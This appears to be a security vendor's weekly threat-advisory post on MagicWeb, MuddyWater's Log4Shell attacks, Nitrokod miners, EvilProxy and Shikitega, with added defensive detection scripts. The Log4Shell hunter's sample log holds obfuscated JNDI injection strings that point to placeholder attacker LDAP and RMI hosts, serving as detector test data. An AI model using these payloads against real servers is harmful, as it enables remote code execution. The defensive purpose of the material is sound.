SISA Weekly Threat Watch
This past week saw the emergence of a new phishing-as-a-service platform for automated attacks and several new malware families operated by state-sponsored groups. The persistent use of a wide range of tools and adapted techniques, including cryptocurrency mining, PowerShell commands and polymorphic encoding, shows that these threat groups have access to extensive resources and diverse skills, something security professionals and network administrators cannot afford to overlook.
SISA Weekly Threat Watch, our weekly feature, brings you a quick snapshot of the major security vulnerabilities and threats that posed a risk to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations that help security teams take appropriate action to defend against the latest critical threats.
Microsoft has identified that the Russian state-sponsored group NOBELIUM (also tracked as APT29 and Cozy Bear) is deploying a new post-compromise capability called MagicWeb, which lets an attacker who already holds administrative access to an AD FS server authenticate as any user. The tool swaps a legitimate DLL used by AD FS for a malicious one that manipulates the user authentication certificates and the claims passed in tokens issued by the infected server.
NOBELIUM replaces Microsoft.IdentityServer.Diagnostics.dll with a backdoored version that adds an extra section to the "TraceLog" class. That added code hooks four legitimate AD FS functions, Build, GetClientCertificate, EndpointConfiguration and ProcessClaims, so that the backdoor can interpose on the server's certificate and claim handling. Because MagicWeb requires prior administrative access to the AD FS server, that access is itself the first thing to hunt for: treat AD FS as Tier 0 infrastructure and audit who can administer it. Microsoft advises following the hunting recommendations in its report and using Microsoft 365 Defender to check the Global Assembly Cache (GAC) for unsigned DLLs.
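A first-pass check for the GAC hunt described above, written here as an added example rather than code from Microsoft's report: it parses the PE header of each DLL and flags files whose Certificate Table data directory is empty, which means no embedded Authenticode signature at all. The GAC path and the constructed sample header are assumptions for illustration. The check only establishes that a signature block is present, not that it is valid, so run Get-AuthenticodeSignature (or signtool verify) on whatever survives, and bear in mind that catalog-signed files also carry no embedded block.

```python
"""Flag PE files with no embedded Authenticode signature block (GAC triage).

Added example; not code from Microsoft's MagicWeb report.  GAC_ROOT and the
build_minimal_pe() sample are assumptions used only for illustration.
"""
import struct
from pathlib import Path

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # data directory slot holding the Certificate Table
GAC_ROOT = r"C:\Windows\Microsoft.NET\assembly"  # assumed location of the .NET 4.x GAC


def security_directory(data: bytes):
    """Return (file_offset, size) of the Certificate Table, or None when the
    file is not a PE image or carries no certificate table.

    Raises ValueError/struct.error on truncated or malformed headers."""
    if data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    coff = e_lfanew + 4                       # 20-byte COFF file header
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20                           # optional header
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:                        # PE32
        count_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:                      # PE32+ (x64)
        count_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    (n_dirs,) = struct.unpack_from("<I", data, count_off)
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return None                           # image declares no Certificate Table slot
    entry = dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    if entry + 8 > opt + opt_size:
        raise ValueError("data directory runs past the optional header")
    offset, size = struct.unpack_from("<II", data, entry)
    return (offset, size) if offset and size else None


def has_authenticode_block(data: bytes) -> bool:
    return security_directory(data) is not None


def find_unsigned(root=GAC_ROOT):
    """Yield .dll/.exe paths under *root* with no certificate table (or an
    unparseable header, which deserves a look on an AD FS server anyway)."""
    for path in Path(root).rglob("*"):
        if path.suffix.lower() not in (".dll", ".exe") or not path.is_file():
            continue
        try:
            if not has_authenticode_block(path.read_bytes()):
                yield path
        except (ValueError, struct.error, OSError):
            yield path


def build_minimal_pe(with_cert_table: bool) -> bytes:
    """Constructed sample: bare PE32+ headers, with or without a Certificate
    Table entry.  Not a loadable image; it only exercises the parser."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt = bytearray(240)                      # PE32+ optional header, 16 data directories
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<I", opt, 108, 16)      # NumberOfRvaAndSizes
    if with_cert_table:
        struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, 0x1000, 0x800)
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, len(opt), 0x2022)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for p in find_unsigned():
        print("no embedded signature:", p)
```

Run it on the AD FS server itself (or on a disk image) and compare the survivors against a known-good build: a Microsoft.IdentityServer.*.dll that shows up here is the MagicWeb indicator Microsoft describes, and anything else on the list needs its signature chain verified before it is dismissed.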
The Log4Shell vulnerability (CVE-2021-44228, remote code execution in Log4j 2) in SysAid applications is being exploited by MERCURY, also known as MuddyWater, a group sponsored by the Iranian government. Earlier in 2022 the group used Log4j 2 exploits against VMware applications, and it is now abusing the same vulnerability in SysAid software. To communicate with their C2 server, the attackers have used several techniques, notably PowerShell along with eHorus, a legitimate remote monitoring and management tool, and vpnui.exe, a customised build of the Ligolo tunnelling tool.
After gaining entry, the attackers establish persistence, move laterally across the organization, and steal credentials. Although SysAid patched the Log4Shell flaw soon after it was disclosed, some organizations have still not applied the patch, so patching remains the primary fix. To reduce the risk of stolen credentials being used, enable multi-factor authentication (MFA) and enforce it for all remote connectivity.
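A hunt for Log4Shell attempts in the web access logs of a Log4j-backed application such as SysAid, written as an added example (it is not SysAid's or Microsoft's code). The access-log lines are constructed in Apache combined format with documentation-range addresses and placeholder paths. The point the detector makes is that a plain `${jndi:` grep is not enough: attackers nest lookups (`${${lower:j}ndi:...}`, `${::-j}`, `${env:X:-j}`) and URL-encode the whole string, so the detector first decodes and collapses those forms and only then looks for the JNDI lookup.

```python
"""Hunt Log4Shell (CVE-2021-44228) lookup strings in web access logs.

Added example with constructed log lines; not SysAid's or Microsoft's code.
Handles nested lookups and URL encoding before matching.
"""
import re
from urllib.parse import unquote

# Innermost Log4j lookup: ${prefix:name} or ${prefix:name:-default}.  "${::-j}" is
# the degenerate form with empty prefix and name.  Nested braces are excluded so the
# pattern always matches inside-out.
INNER_LOOKUP = re.compile(r"\$\{([A-Za-z]*):([^${}:]*)(?::-([^${}]*))?\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)

SAMPLE_LOG = [  # constructed, Apache combined format; addresses are documentation ranges
    '198.51.100.23 - - [11/Sep/2022:02:10:41 +0000] "GET /login HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [11/Sep/2022:02:10:42 +0000] "GET /login HTTP/1.1" 200 1834 "-" "${jndi:ldap://203.0.113.9:1389/o}"',
    '198.51.100.23 - - [11/Sep/2022:02:10:43 +0000] "GET /login?user=${${lower:j}${upper:n}di:${::-l}dap://203.0.113.9:1389/o} HTTP/1.1" 200 1834 "-" "curl/7.79"',
    '198.51.100.23 - - [11/Sep/2022:02:10:44 +0000] "GET /login?user=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fo%7D HTTP/1.1" 200 1834 "-" "-"',
    '192.0.2.77 - - [11/Sep/2022:02:11:00 +0000] "GET /report?name=${ctx:user} HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]


def _resolve(m):
    prefix, name, default = m.group(1).lower(), m.group(2), m.group(3)
    if prefix == "jndi":
        return m.group(0)            # never fold away the thing we are looking for
    if default is not None:          # ${env:X:-j} and ${::-j} evaluate to their default
        return default
    if prefix == "lower":
        return name.lower()
    if prefix == "upper":
        return name.upper()
    return name                      # other lookups: keep the name; enough for detection


def normalise(s: str, rounds: int = 10) -> str:
    """Undo repeated URL encoding, then collapse nested lookups inside-out."""
    for _ in range(3):
        u = unquote(s)
        if u == s:
            break
        s = u
    for _ in range(rounds):
        t = INNER_LOOKUP.sub(_resolve, s)
        if t == s:
            break
        s = t
    return s


def find_log4shell(lines):
    """Return [(line_no, normalised_lookup)] for lines carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalise(line)
        m = JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            hits.append((n, norm[m.start():end + 1] if end != -1 else norm[m.start():]))
    return hits


if __name__ == "__main__":
    for n, payload in find_log4shell(SAMPLE_LOG):
        print(f"line {n}: {payload}")
```

Feed it every field the application logs, not only the request line: Log4j evaluates the lookup wherever the string lands, and the User-Agent and other headers are common carriers. A hit shows an attempt, not a success; the exploit needs the server to reach the attacker's LDAP or RMI listener, so pair these hits with egress logs for the same minute, and remember the fix is the patch, not the detection.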
A new campaign spreading cryptocurrency mining malware across 11 countries was found masquerading as Google Translate or MP3 downloader desktop applications, distributed through reputable free-software sites. According to research by Check Point, the malware was developed by a firm calling itself "Nitrokod"; the applications appear clean at first sight and deliver the advertised functionality.
The user receives a password-protected RAR, which evades antivirus scanning, containing an executable with the same name as the chosen app. On the fifth day after infection the malware activates a dropper from another encrypted RAR file and uses PowerShell commands to clear the system event logs. After 15 days it loads the final dropper, which retrieves another RAR file containing the XMRig mining malware, its controller and a ".sys" file, before dropping the final payload. The long delays separate the install from the malicious activity, so sandboxes and early reviews see nothing. Avoid installing apps that claim features the developer has not officially released, such as a desktop Google Translate tool, and treat event-log clearing by a recently installed application as an incident in its own right.
EvilProxy is a reverse-proxy phishing-as-a-service (PhaaS) platform that claims to capture authentication tokens, and so bypass multi-factor authentication (MFA), for sites including Apple, Google, Facebook, Microsoft, Twitter, GitHub, GoDaddy and even PyPI. The service lets low-skill threat actors take over otherwise well-protected accounts, because they no longer need to know how to set up a reverse proxy themselves.
When the victim connects to the phishing page, the reverse proxy shows the genuine login form, forwards the victim's requests to the legitimate site and relays its responses, including the MFA prompt. Once the login completes, the proxy holds the session cookie and the threat actors use it to log in to the site as the user. Resecurity reports that customers arrange payment individually through Telegram. Regular backups, strong passwords, enforced MFA and a DLP solution on endpoints are the recommended safeguards, with one caveat: OTP and push-based MFA are exactly what a reverse proxy relays, so phishing-resistant methods such as FIDO2/WebAuthn, where the credential is bound to the origin the browser actually visited, are the controls this technique does not defeat.
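One server-side signal for the cookie-replay step described above, as an added example (not Resecurity's or any vendor's code): once the proxy has completed the login, the captured session cookie is used from the operator's machine, so the same session id appears from a second client address, usually with a different User-Agent, minutes after an MFA-approved login. The event records below are constructed and their field names are assumptions; real IdP and application logs use their own schema.

```python
"""Flag session cookies used from a second client shortly after login (AiTM replay).

Added example with constructed events; field names are assumptions, not a real
IdP's schema.
"""
from datetime import datetime, timedelta

EVENTS = [  # constructed sample events, documentation-range addresses
    {"ts": "2022-09-05T08:02:11Z", "user": "a.smith", "sid": "S1", "ip": "192.0.2.10",
     "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/105", "action": "login_mfa_ok"},
    {"ts": "2022-09-05T08:05:40Z", "user": "a.smith", "sid": "S1", "ip": "192.0.2.10",
     "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/105", "action": "mail_read"},
    # b.jones signed in through a reverse proxy: the service saw the proxy's address ...
    {"ts": "2022-09-05T09:12:03Z", "user": "b.jones", "sid": "S2", "ip": "203.0.113.5",
     "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/105", "action": "login_mfa_ok"},
    # ... and the captured cookie is then replayed from the operator's own host.
    {"ts": "2022-09-05T09:13:30Z", "user": "b.jones", "sid": "S2", "ip": "198.51.100.77",
     "ua": "Mozilla/5.0 (X11; Linux x86_64) Firefox/104", "action": "mail_read"},
    {"ts": "2022-09-05T09:14:02Z", "user": "b.jones", "sid": "S2", "ip": "198.51.100.77",
     "ua": "Mozilla/5.0 (X11; Linux x86_64) Firefox/104", "action": "inbox_rule_create"},
]


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def find_replayed_sessions(events, window=timedelta(hours=1)):
    """Return {sid: details} for sessions whose cookie is presented from a client
    address other than the one that completed MFA, within *window* of that login."""
    login = {}      # sid -> (time, ip, ua) of the MFA-approved login
    flagged = {}
    for e in sorted(events, key=lambda e: parse_ts(e["ts"])):
        sid, t = e["sid"], parse_ts(e["ts"])
        if e["action"] == "login_mfa_ok":
            login[sid] = (t, e["ip"], e["ua"])
            continue
        if sid not in login:
            continue
        t0, ip0, ua0 = login[sid]
        if e["ip"] != ip0 and t - t0 <= window and sid not in flagged:
            flagged[sid] = {
                "user": e["user"],
                "login_ip": ip0,
                "replay_ip": e["ip"],
                "ua_changed": e["ua"] != ua0,       # a second browser is the stronger tell
                "seconds_after_login": int((t - t0).total_seconds()),
                "first_action": e["action"],
            }
    return flagged


if __name__ == "__main__":
    for sid, details in find_replayed_sessions(EVENTS).items():
        print(sid, details)
```

On its own this rule is noisy, since mobile carriers and VPNs change a legitimate user's address mid-session; weight it by the User-Agent change, the ASN of the two addresses, and what the session does next (inbox rules, MFA method changes). The structural answer remains phishing-resistant MFA: a FIDO2 assertion is signed over the origin the browser actually talked to, so one produced on the proxy's domain is rejected by the real site.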
Shikitega, a new stealthy Linux malware, has been found infecting computers and IoT devices with additional payloads. It establishes persistence through crontab entries, exploits vulnerabilities to escalate privileges, and then launches a cryptocurrency miner on the infected device. According to AT&T Alien Labs' report, Shikitega uses a polymorphic encoder and delivers its payload in stages, with each stage exposing only a portion of the whole.
The encoder (Metasploit's "Shikata Ga Nai") runs the payload through multiple decode loops, each of which decodes the next layer until the final shellcode is decoded and executed. That shellcode contacts the command and control (C2) servers and obtains additional shellcode to run. Mettle, the Metasploit payload for Linux, then fetches a small ELF file that exploits the PwnKit vulnerability (CVE-2021-4034 in polkit's pkexec) to gain root, and the final-stage payload, a cryptocurrency miner, is downloaded and run with those privileges. Keep software up to date, in particular patch polkit on every Linux host, monitor crontab for new entries, and enforce MFA and strong passwords.
See you next week with more interesting bites!!